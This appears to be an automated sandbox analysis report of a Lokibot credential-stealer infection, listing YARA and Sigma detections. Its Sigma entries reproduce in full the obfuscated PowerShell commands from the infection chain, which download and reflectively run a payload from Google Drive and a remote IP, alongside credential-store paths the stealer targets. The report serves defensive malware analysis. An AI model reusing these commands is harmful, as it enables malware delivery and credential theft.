26.2.aspnet_regbrowsers.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
26.2.aspnet_regbrowsers.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
26.2.aspnet_regbrowsers.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
26.2.aspnet_regbrowsers.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
26.2.aspnet_regbrowsers.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
26.2.aspnet_regbrowsers.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
26.2.aspnet_regbrowsers.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 11 entries

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5k

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithgoodnewsgivenbygodthingsgreat[1].hta

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Source: Process started

Author: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7d

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7d

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7d

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS" , ProcessId: 2836, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))", CommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgI

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3556, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3848, ProcessName: mshta.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; 